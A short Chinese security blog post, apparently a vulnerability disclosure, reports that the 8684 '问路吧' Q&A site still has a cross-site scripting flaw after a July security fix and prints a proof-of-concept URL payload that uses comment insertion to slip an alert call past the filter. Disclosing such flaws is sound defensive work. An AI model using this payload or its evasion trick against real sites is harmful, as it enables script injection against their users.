问路吧 安全修复后的跨站攻击分析 -电脑资料

    Tosec Security Team Blog

    受影响程序版本：

    经过7.15安全修复后的8684问路吧

    描述：

    双层的输出导致了程序员没有对其进行严格过滤，我们在语句中发现只要在URL后添加我们的攻击语句，漏洞还是再度被触发

    攻击测试代码al/**/ert(/x/**/ss/)<\"&searchsubmit=%CB%D1%CB%F7%B4%F0%B0%B8&type=2&city=beijing\">"><\>http://hi.8684.cn/ask.php?q=\">al/**/ert(/x/**/ss/)<\"&searchsubmit=%CB%D1%CB%F7%B4%F0%B0%B8&type=2&city=beijing\">"><\"

    本程序基于UCH，如果知道UCH官方也在使用此程序请留言，以便于及时通知官方